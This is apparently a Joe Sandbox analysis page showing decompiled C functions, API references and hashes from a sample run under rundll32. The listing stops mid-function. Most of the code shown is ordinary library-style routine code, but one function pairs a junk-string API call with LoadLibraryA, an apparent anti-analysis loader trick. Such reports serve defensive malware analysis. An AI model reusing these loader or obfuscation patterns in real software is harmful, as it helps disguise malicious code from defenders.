Function 10003057 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10003057(CHAR* _a4) {
				signed int _t2;

				_t2 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9);
				return  &((LoadLibraryA(_a4))[_t2 *  *0x100440d0]);
			}

0x10003070
0x1000308f

APIs

GetCurrencyFormatW.KERNEL32 ref: 10003070
LoadLibraryA.KERNEL32(?), ref: 10003086

Strings

xadqsavcbdfewescGADW, xrefs: 1000305D
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10003064

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrencyFormatLibraryLoad
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 1566795320-3161301136
Opcode ID: b688c3496de217a7e3c91dcb6abf11db8e2619d95133c7353a921a1f77c43571
Instruction ID: c8b8bc68fb586c21cf620b45a97a61bfa4732d23f622789b4932f32e46aada1a
Opcode Fuzzy Hash: b688c3496de217a7e3c91dcb6abf11db8e2619d95133c7353a921a1f77c43571
Instruction Fuzzy Hash: 37D05E32644230BAE2125790AD4AFC2AB14E75A752F028004FB04FD5E1C36004A08EA5

Uniqueness

Uniqueness Score: -1.00%

Function 10018DA4 Relevance: 6.3, APIs: 4, Instructions: 309
memoryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10018DA4(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, signed int _a12, signed int _a16, char _a20, signed int _a44, signed int _a48, signed int _a52, intOrPtr _a56, signed int _a60, intOrPtr _a64, char _a68, intOrPtr _a92, signed int _a96, signed int _a100, intOrPtr _a104, signed int _a108, intOrPtr _a112, signed int _a116, char _a120) {
				signed int _v4;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				void* _v40;
				char _v124;
				char _v168;
				char _v176;
				char _v184;
				intOrPtr _v196;
				signed int* __ebp;
				signed int _t132;
				signed int _t138;
				signed int _t139;
				void* _t140;
				intOrPtr* _t145;
				intOrPtr* _t148;
				signed int _t149;
				signed int _t151;
				intOrPtr* _t152;
				void* _t154;
				intOrPtr* _t158;
				signed int _t163;
				intOrPtr _t164;
				intOrPtr* _t166;
				intOrPtr* _t168;
				void* _t179;
				intOrPtr _t182;
				signed int _t183;
				signed int _t185;
				signed int* _t186;
				void* _t187;
				intOrPtr* _t188;
				signed int _t202;
				signed int _t204;
				intOrPtr _t214;
				intOrPtr _t220;
				intOrPtr* _t222;
				intOrPtr _t223;
				signed int _t225;
				void* _t228;
				void* _t229;
				void* _t231;
				void* _t232;

				_t188 = __ecx;
				_t181 = __ebx;
				_t232 = _t231 - 0x74;
				_t225 =  &_v124;
				_t132 =  *0x10045580; // 0x2ef01728
				_a116 = _t132 ^ _t225;
				_push(0x1c);
				E1001FBC4(E100344DD, __ebx, __edi, __esi);
				_t222 = __ecx;
				_v16 =  *((intOrPtr*)(__ecx + 0x14));
				_a4 =  *((intOrPtr*)(__ecx + 0x10));
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					_t138 =  *(__ecx + 8);
					__eflags = _t138;
					if(_t138 != 0) {
						_t215 =  &_a12;
						_t139 =  *((intOrPtr*)( *_t138 + 0xc))(_t138, 0x1003b18c,  &_a12,  &_a8);
						__eflags = _t139;
						if(_t139 >= 0) {
							E100157C0( &_a12,  &_a20, 0x1003b8b8);
							_a52 = _a52 | 0xffffffff;
							_a44 = 0;
							_a48 = 0;
							_a56 = 0x18;
							_a60 = 0;
							_a64 = 0x1fb;
							E100157C0( &_a12,  &_a68, 0x1003b8a0);
							_t145 = _a12;
							_a100 = _a100 | 0xffffffff;
							_t215 =  &_a20;
							_a92 = 0x1c;
							_a96 = 0;
							_a104 = 0x20;
							_a108 = 0;
							_a112 = 0x1e;
							_t183 =  *((intOrPtr*)( *_t145 + 0x10))(_t145, 2,  &_a20, 0x28, 0);
							__eflags = _t183;
							if(_t183 >= 0) {
								_t215 = 0;
								_v40 = _a8;
								_t148 = _a12;
								_v36 = 1;
								_v32 = 0;
								_v28 = 0;
								_v24 = 0;
								_t149 =  *((intOrPtr*)( *_t148 + 0x18))(_t148, 0, 0,  &_v40);
								__eflags = _t149;
								 *_t225 = _t149;
								if(_t149 >= 0) {
									 *((intOrPtr*)(_t222 + 0x14)) = _v32;
									_t151 = _v20;
									_a8 = _t151;
									 *(_t222 + 0x10) = _t151;
									_t152 = _a12;
									 *((intOrPtr*)(_t222 + 0x34)) = _v28;
									 *((intOrPtr*)( *_t152 + 8))(_t152);
									goto L32;
								} else {
									_t166 = _a12;
									 *((intOrPtr*)( *_t166 + 8))(_t166);
								}
								goto L50;
							} else {
								_t168 = _a12;
								 *((intOrPtr*)( *_t168 + 8))(_t168);
								_t139 = _t183;
							}
						}
					} else {
						_t139 = 0;
					}
					goto L51;
				} else {
					__eax =  *(__esi + 0x4c);
					__ecx =  *__eax;
					__edx =  &_a16;
					__eax =  *((intOrPtr*)(__ecx + 0x14))(__eax, 0x1003b39c, __edx);
					__eflags = __eax;
					 *__ebp = __eax;
					if(__eax < 0) {
						L51:
						 *[fs:0x0] = _v12;
						_pop(_t220);
						_pop(_t223);
						_pop(_t182);
						_t140 = E1001FBB5(_t139, _t182, _a116 ^ _t225, _t215, _t220, _t223);
						__eflags =  &_a120;
						return _t140;
					} else {
						__eax = _a16;
						__ecx =  *__eax;
						__edx =  &_a8;
						_push( &_a8);
						_push(0x1003b37c);
						_push(__eax);
						__eflags = __eax;
						if(__eflags >= 0) {
							__eax = _a8;
							__edx =  &_a12;
							_push( &_a12);
							_push(0x1003b4bc);
							_a12 = 0;
							__ecx =  *__eax;
							_push(__eax);
							__eflags = __eax;
							if(__eflags >= 0) {
								__eax = _a12;
								__ecx =  *__eax;
								__edx = __esi + 0x58;
								__edx =  *(__esi + 4);
								__edx =  *(__esi + 4) + 0xe8;
								__eflags = __edx;
								__eax =  *((intOrPtr*)( *__eax + 0x14))(__eax, __edx, __esi + 0x58);
								__eax = _a12;
								__ecx =  *__eax;
								__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
							}
							__eax = _a8;
							__ecx =  *__eax;
							__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
						}
						__eax = E10004D4A(__eflags, 0x14);
						__eflags = __eax - __edi;
						if(__eax == __edi) {
							__eax = 0;
							__eflags = 0;
						} else {
							__ecx = __eax;
							__eax = E100185F7(__eax, _a16);
						}
						 *(__esi + 0x50) = __eax;
						__eax = _a16;
						__ecx =  *__eax;
						__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
						__eax =  *(__esi + 0x50);
						__ecx =  *__eax;
						__eflags =  *__eax - __edi;
						if(__eflags != 0) {
							__eflags = __eax;
							__eax = E100159E9(__ecx, __eax);
						}
						__eax = E10004D4A(__eflags, 0x28);
						__eflags = __eax - __edi;
						if(__eax == __edi) {
							__eax = 0;
							__eflags = 0;
						} else {
							__ecx = __eax;
							__eax = E10014659(__eax, __edi, 0x1f40);
						}
						__edx =  *(__esi + 0x50);
						 *(__esi + 0x54) = __eax;
						_push( *( *(__esi + 0x50)));
						__ecx = __eax;
						__eax =  *(__esi + 0x54);
						__ecx =  *(__esi + 0x50);
						 *(__ecx + 8) =  *(__esi + 0x54);
						__eax =  *(__esi + 0x54);
						__eax =  *( *(__esi + 0x54) + 0xc);
						__eflags = __eax - 0x3333333;
						 *(__esi + 0x10) = __eax;
						if(__eax <= 0x3333333) {
							__eax = __eax * 0x28;
							__imp__CoTaskMemAlloc(__eax);
							__ecx = 0;
							__eflags = __eax - __edi;
							__ecx = 0 | __eflags != 0x00000000;
							 *(__esi + 0x14) = __eax;
							if(__eflags != 0) {
								 *(__esi + 0x10) =  *(__esi + 0x10) * 0x28;
								__eax = E10020F40(__edi, __eax, __edi,  *(__esi + 0x10) * 0x28);
								__ecx =  *(__esi + 0x50);
								__eax = E10018619( *(__esi + 0x50));
								__ecx =  *(__esi + 0x50);
								__eax = E100159A6(__ecx);
								L32:
								__eflags =  *(_t222 + 0x10);
								_a16 = 0;
								if( *(_t222 + 0x10) > 0) {
									_t187 = 0;
									__eflags = 0;
									do {
										_t163 = E10004D4A(__eflags, 0x1c);
										_a8 = _t163;
										__eflags = _t163;
										_v4 = 0;
										if(_t163 == 0) {
											_t164 = 0;
											__eflags = 0;
										} else {
											_t164 = E1001B8FB(_t163, 0xa);
										}
										_v4 = _v4 | 0xffffffff;
										_a16 = _a16 + 1;
										 *((intOrPtr*)(_t187 +  *((intOrPtr*)(_t222 + 0x14)) + 0x24)) = _t164;
										_t187 = _t187 + 0x28;
										__eflags = _a16 -  *(_t222 + 0x10);
									} while (__eflags < 0);
								}
								_t185 = _v16;
								__eflags = _t185;
								if(_t185 != 0) {
									__eflags = _a4;
									if(_a4 > 0) {
										_t154 = 0xffffffdc;
										_t186 = _t185 + 0x24;
										_a16 = _a4;
										_a8 = _t154 - _v16;
										while(1) {
											_t202 =  *( *_t186 + 4);
											__eflags = _t202;
											_a4 = _t202;
											if(_t202 == 0) {
												goto L46;
											}
											while(1) {
												_t158 = E1000911A( &_a4);
												_t215 =  *_t222;
												 *((intOrPtr*)( *_t222 + 8))( *_t158, 1);
												__eflags = _a4;
												if(_a4 == 0) {
													goto L46;
												}
											}
											L46:
											E1001B823( *_t186);
											_t204 =  *_t186;
											__eflags = _t204;
											if(_t204 != 0) {
												 *((intOrPtr*)( *_t204 + 4))(1);
											}
											_t186 =  &(_t186[0xa]);
											_t127 =  &_a16;
											 *_t127 = _a16 - 1;
											__eflags =  *_t127;
											if( *_t127 != 0) {
												continue;
											}
											goto L49;
										}
									}
									L49:
									__imp__CoTaskMemFree(_v16);
								}
								L50:
								_t139 =  *_t225;
								goto L51;
							} else {
								_push(_t225);
								_t228 = _t232;
								_push(_t188);
								_v168 = 0x100442e0;
								E100209E8( &_v168, 0x1003e1e4);
								asm("int3");
								_push(_t228);
								_t229 = _t232;
								_push(_t188);
								_v176 = 0x10044378;
								E100209E8( &_v176, 0x1003e298);
								asm("int3");
								_push(_t229);
								_push(_t188);
								_v184 = 0x10044410;
								E100209E8( &_v184, 0x1003e2dc);
								asm("int3");
								_push(4);
								E1001FBC4(E10032E9B, _t181, 0, _t222);
								_t214 = E100105C8(0x104);
								_v196 = _t214;
								_t179 = 0;
								_v184 = 0;
								if(_t214 != 0) {
									_t179 = E1000E58E(_t214);
								}
								return E1001FC9C(_t179);
							}
						} else {
							__eax = 0x8007000e;
							goto L51;
						}
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 10018DBD
CoTaskMemAlloc.OLE32(?,?), ref: 10018EDB
_memset.LIBCMT ref: 10018EFD
CoTaskMemFree.OLE32(?), ref: 100190D9

Part of subcall function 10004D4A: _malloc.LIBCMT ref: 10004D64

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Task$AllocFreeH_prolog3_malloc_memset
String ID:
API String ID: 2459298410-0
Opcode ID: b121ae2c8e829696b65b9efb5c59cf0f74438459b6ac44388d9d562fa2d0b33e
Instruction ID: a1cdd10b8d3f28a5117ac55e09806983a961173fe6bfd8d1acb233a2e2c4c6df
Opcode Fuzzy Hash: b121ae2c8e829696b65b9efb5c59cf0f74438459b6ac44388d9d562fa2d0b33e
Instruction Fuzzy Hash: C9C106B4600709EFCB15CF68C88499AB7F5FF88704B20891AF956CF291DB71EA85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10019C50 Relevance: 6.2, APIs: 4, Instructions: 186
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 70%

			E10019C50(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t83;
				intOrPtr* _t84;
				intOrPtr _t85;
				intOrPtr* _t86;
				intOrPtr _t101;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t145;
				intOrPtr* _t151;
				intOrPtr* _t160;
				intOrPtr _t161;
				intOrPtr _t162;
				void* _t163;
				void* _t164;
				intOrPtr _t166;
				intOrPtr* _t167;
				void* _t168;
				intOrPtr _t180;

				_push(0x10);
				E1001FBC4(E100345BC, __ebx, __edi, __esi);
				_t166 = __ecx;
				 *((intOrPtr*)(_t168 - 0x1c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x1003892c;
				 *(_t168 - 4) = 0;
				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
					L11:
					while( *((intOrPtr*)(_t166 + 0x24)) != 0) {
						_t160 =  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x1c)) + 8));
						__eflags = _t160;
						if(_t160 == 0) {
							break;
						}
						_t151 =  *_t160;
						__eflags = _t151;
						if(_t151 == 0) {
							break;
						}
						 *((intOrPtr*)( *_t151 + 0xbc))( *((intOrPtr*)(_t160 + 8)), 0);
						 *((intOrPtr*)( *_t160 + 0x98)) = 0;
					}
					 *((intOrPtr*)(_t168 - 0x18)) = _t166 + 0x18;
					E1001B823(_t166 + 0x18);
					if( *((intOrPtr*)(_t166 + 0x40)) == 0) {
						L19:
						_t83 =  *((intOrPtr*)(_t166 + 8));
						if(_t83 != 0) {
							 *((intOrPtr*)( *_t83 + 8))(_t83);
						}
						_t84 =  *((intOrPtr*)(_t166 + 0xc));
						if(_t84 != 0) {
							 *((intOrPtr*)( *_t84 + 8))(_t84);
						}
						if( *((intOrPtr*)(_t166 + 0x14)) == 0) {
							L32:
							_t85 =  *((intOrPtr*)(_t166 + 0x34));
							if(_t85 != 0) {
								__imp__CoTaskMemFree(_t85);
							}
							_t136 =  *((intOrPtr*)(_t166 + 0x54));
							if( *((intOrPtr*)(_t166 + 0x54)) != 0) {
								E10018664(_t136,  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x50)))));
								E10014682( *((intOrPtr*)(_t166 + 0x54)));
							}
							_t161 =  *((intOrPtr*)(_t166 + 0x54));
							_t192 = _t161;
							if(_t161 != 0) {
								E10014682(_t161);
								_push(_t161);
								E10004D75(0, _t161, _t166, _t192);
							}
							_t162 =  *((intOrPtr*)(_t166 + 0x50));
							_t193 = _t162;
							if(_t162 != 0) {
								E10019A2F(_t162, _t193);
								_push(_t162);
								E10004D75(0, _t162, _t166, _t193);
							}
							_t86 =  *((intOrPtr*)(_t166 + 0x4c));
							if(_t86 != 0) {
								 *((intOrPtr*)( *_t86 + 8))(_t86);
							}
							_t167 =  *((intOrPtr*)(_t166 + 0x48));
							if(_t167 != 0) {
								 *((intOrPtr*)( *_t167 + 8))(_t167);
							}
							 *(_t168 - 4) =  *(_t168 - 4) | 0xffffffff;
							return E1001FC9C(E1001B91E( *((intOrPtr*)(_t168 - 0x18))));
						} else {
							 *((intOrPtr*)(_t168 - 0x10)) = 0;
							if( *((intOrPtr*)(_t166 + 0x10)) <= 0) {
								L31:
								__imp__CoTaskMemFree( *((intOrPtr*)(_t166 + 0x14)));
								goto L32;
							}
							_t163 = 0;
							do {
								_t101 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24)) + 4));
								 *((intOrPtr*)(_t168 - 0x14)) = _t101;
								if(_t101 == 0) {
									goto L28;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((intOrPtr*)( *((intOrPtr*)(E1000911A(_t168 - 0x14))) + 0x98)) = 0;
								} while ( *((intOrPtr*)(_t168 - 0x14)) != 0);
								L28:
								E1001B823( *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24)));
								_t145 =  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24));
								if(_t145 != 0) {
									 *((intOrPtr*)( *_t145 + 4))(1);
								}
								 *((intOrPtr*)(_t168 - 0x10)) =  *((intOrPtr*)(_t168 - 0x10)) + 1;
								_t163 = _t163 + 0x28;
							} while ( *((intOrPtr*)(_t168 - 0x10)) <  *((intOrPtr*)(_t166 + 0x10)));
							goto L31;
						}
					}
					_t164 = 0;
					if( *((intOrPtr*)(_t166 + 0x38)) <= 0) {
						L17:
						if(_t180 != 0) {
							_push( *((intOrPtr*)(_t166 + 0x3c)));
							E10004D75(0, _t164, _t166, _t180);
							_push( *((intOrPtr*)(_t166 + 0x40)));
							E10004D75(0, _t164, _t166, _t180);
						}
						goto L19;
					}
					 *((intOrPtr*)(_t168 - 0x10)) = 0;
					do {
						__imp__#9( *((intOrPtr*)(_t166 + 0x40)) +  *((intOrPtr*)(_t168 - 0x10)));
						 *((intOrPtr*)(_t168 - 0x10)) =  *((intOrPtr*)(_t168 - 0x10)) + 0x10;
						_t164 = _t164 + 1;
					} while (_t164 <  *((intOrPtr*)(_t166 + 0x38)));
					_t180 =  *((intOrPtr*)(_t166 + 0x38));
					goto L17;
				}
				_t121 =  *((intOrPtr*)(__ecx + 0x50));
				if(_t121 == 0) {
					goto L11;
				}
				_t122 =  *_t121;
				_push(_t168 - 0x14);
				_push(0x1003b37c);
				_push(_t122);
				if( *((intOrPtr*)( *_t122))() < 0) {
					goto L11;
				}
				_t124 =  *((intOrPtr*)(_t168 - 0x14));
				if(_t124 == 0) {
					goto L11;
				}
				_push(_t168 - 0x10);
				_push(0x1003b4bc);
				 *((intOrPtr*)(_t168 - 0x10)) = 0;
				_push(_t124);
				if( *((intOrPtr*)( *_t124 + 0x10))() >= 0) {
					_t128 =  *((intOrPtr*)(_t168 - 0x10));
					if(_t128 != 0) {
						 *((intOrPtr*)( *_t128 + 0x18))(_t128,  *((intOrPtr*)(__ecx + 0x58)));
						_t130 =  *((intOrPtr*)(_t168 - 0x10));
						 *((intOrPtr*)( *_t130 + 8))(_t130);
					}
				}
				_t126 =  *((intOrPtr*)(_t168 - 0x14));
				 *((intOrPtr*)( *_t126 + 8))(_t126);
				goto L11;
			}

APIs

__EH_prolog3.LIBCMT ref: 10019C57
VariantClear.OLEAUT32(?), ref: 10019D1B
CoTaskMemFree.OLE32(?,00000010), ref: 10019DC8
CoTaskMemFree.OLE32(?,00000010), ref: 10019DD6

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: FreeTask$ClearH_prolog3Variant
String ID:
API String ID: 365290523-0
Opcode ID: cd38f89cae56ad47c5dcbd5386d246e758d2adde0798c45e4cdf38565e7e9628
Instruction ID: f4ca11870bf7736933ae268dd06283376a7c22ef50caea19de43a80b2043cb75
Opcode Fuzzy Hash: cd38f89cae56ad47c5dcbd5386d246e758d2adde0798c45e4cdf38565e7e9628
Instruction Fuzzy Hash: C6711475A00A42DFCB60CFA8C9C586AB7F6FF48304762486DE5469BA61CB31FD81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1001987A Relevance: 6.2, APIs: 4, Instructions: 173
windowCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E1001987A(signed int __ecx, void* __edx) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				signed int _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				char _v76;
				intOrPtr _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t63;
				signed int _t64;
				intOrPtr _t70;
				signed int _t72;
				signed int _t73;
				signed int _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t84;
				signed int _t86;
				signed int _t88;
				signed int _t92;
				intOrPtr* _t99;
				signed int _t100;
				signed int _t126;
				intOrPtr _t127;
				void* _t144;
				void* _t147;
				intOrPtr* _t148;
				signed int** _t150;
				signed int* _t151;
				signed int _t154;
				signed int _t156;
				void* _t158;
				void* _t161;

				_t144 = __edx;
				_t126 = __ecx;
				_t158 = _t161;
				_t154 = __ecx;
				_t63 =  *((intOrPtr*)(__ecx + 4));
				_push(_t147);
				if(_t63 != 0) {
					_t64 =  *(_t63 + 0x28);
					__eflags = _t64;
					if(_t64 == 0) {
						goto L4;
					} else {
						_t126 = _t64;
						_t72 = E1000BBDF(0, _t126, _t147);
						__eflags = _t72;
						_v8 = _t72;
						if(_t72 == 0) {
							goto L4;
						} else {
							_t73 = IsWindowVisible( *(_t72 + 0x20));
							asm("sbb eax, eax");
							_t75 =  ~_t73 + 1;
							__eflags = _t75;
							_v24 = _t75;
							if(_t75 != 0) {
								GetWindowRect( *(E1000A8F0(0, _t126, _t158, GetDesktopWindow()) + 0x20),  &_v56);
								GetWindowRect( *(_v8 + 0x20),  &_v40);
								asm("cdq");
								asm("cdq");
								__eflags = _v56.right - _v56.left - _t144;
								E1000EF54(_v8, _v56.right - _v56.left - _t144 >> 1, _v56.bottom - _v56.top - _t144 >> 1, 0, 0, 0);
								E1000EF92(_v8, 1);
							}
							_t77 =  *((intOrPtr*)( *((intOrPtr*)(_t154 + 4)) + 0x50));
							_t148 = _t154 + 0x48;
							_t78 =  *((intOrPtr*)( *_t77))(_t77, 0x100388c0, _t148);
							__eflags = _t78;
							if(_t78 < 0) {
								_t80 =  *((intOrPtr*)( *((intOrPtr*)(_t154 + 4)) + 0x50));
								_t81 =  *((intOrPtr*)( *_t80))(_t80, 0x10038918,  &_v16);
								__eflags = _t81;
								if(_t81 >= 0) {
									_t82 = _v16;
									 *((intOrPtr*)( *_t82 + 0x14))(_t82,  &_v20);
									_t84 = _v16;
									 *((intOrPtr*)( *_t84 + 8))(_t84);
									_t86 = _v20;
									__eflags = _t86;
									if(_t86 != 0) {
										_t150 = _t154 + 8;
										_v12 =  *((intOrPtr*)( *_t86))(_t86, 0x1003b17c, _t150);
										_t88 = _v20;
										 *((intOrPtr*)( *_t88 + 8))(_t88);
										_t81 = _v12;
										__eflags = _t81;
										if(__eflags >= 0) {
											_t151 =  *_t150;
											 *( *_t151)(_t151, 0x1003b16c, _t154 + 0xc);
											goto L21;
										}
									} else {
										_t81 = 0x80004005;
									}
								}
							} else {
								_t99 =  *_t148;
								_t151 = _t154 + 0x4c;
								_t100 =  *((intOrPtr*)( *_t99 + 0xc))(_t99, 0, 0x1003b40c, _t151);
								__eflags =  *_t151;
								_v12 = _t100;
								if( *_t151 == 0) {
									_v12 = 0x80004003;
								}
								__eflags = _v12;
								if(__eflags >= 0) {
									L21:
									_t92 = E10018DA4(0, _t154, _t151, _t154, __eflags);
									__eflags = _v24;
									_t156 = _t92;
									if(_v24 != 0) {
										__eflags = _v40.right - _v40.left;
										E1000EF54(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
										E1000EF92(_v8, 0);
									}
									_t81 = _t156;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										__eflags = _v40.right - _v40.left;
										E1000EF54(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
										E1000EF92(_v8, 0);
									}
									_t81 = _v12;
								}
							}
							return _t81;
						}
					}
				} else {
					L4:
					_push(_t158);
					_push(_t126);
					_v76 = 0x10044410;
					E100209E8( &_v76, 0x1003e2dc);
					asm("int3");
					_push(4);
					E1001FBC4(E10032E9B, 0, _t147, _t154);
					_t127 = E100105C8(0x104);
					_v88 = _t127;
					_t70 = 0;
					_v76 = 0;
					if(_t127 != 0) {
						_t70 = E1000E58E(_t127);
					}
					return E1001FC9C(_t70);
				}
			}

APIs

IsWindowVisible.USER32(?), ref: 100198AB
GetDesktopWindow.USER32 ref: 100198BB
GetWindowRect.USER32 ref: 100198D4
GetWindowRect.USER32 ref: 100198E0

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Rect$DesktopVisible
String ID:
API String ID: 1055025324-0
Opcode ID: ef76f55fcefd2cae7d74b9455366248ca8dbe27d5b7ca6cb76258884cb09bc7f
Instruction ID: 8de48d2105652726057613f2335e895d96fc1fae9d5598094c6c5e62d9502a62
Opcode Fuzzy Hash: ef76f55fcefd2cae7d74b9455366248ca8dbe27d5b7ca6cb76258884cb09bc7f
Instruction Fuzzy Hash: F751F975A0010AAFDB04DFA8CD84CAEB7B9FF49344B114468F605EB265DB30EE41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1001C6EB Relevance: 6.1, APIs: 4, Instructions: 132
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001C6EB(void* __ecx, void* __eflags, signed int* _a4) {
				char _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				char _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t52;
				long _t56;
				signed int* _t75;
				signed int* _t78;
				signed int* _t81;
				struct _FILETIME* _t88;
				void* _t100;
				CHAR* _t101;
				signed int* _t102;
				void* _t103;
				void* _t107;

				_t85 = __ecx;
				_t102 = _a4;
				_t100 = __ecx;
				E10020F40(__ecx, _t102, 0, 0x128);
				E10004EB7(0, _t85, _t100, _t102, _t103,  &(_t102[8]), 0x104,  *(_t100 + 0xc), 0xffffffff);
				_t52 =  *(_t100 + 4);
				_t107 = _t52 -  *0x100384f0; // 0xffffffff
				if(_t107 == 0) {
					L21:
					return 1;
				}
				_t88 =  &_v12;
				if(GetFileTime(_t52, _t88,  &_v20,  &_v28) != 0) {
					_t56 = GetFileSize( *(_t100 + 4), 0);
					_t102[6] = _t56;
					_t102[7] = 0;
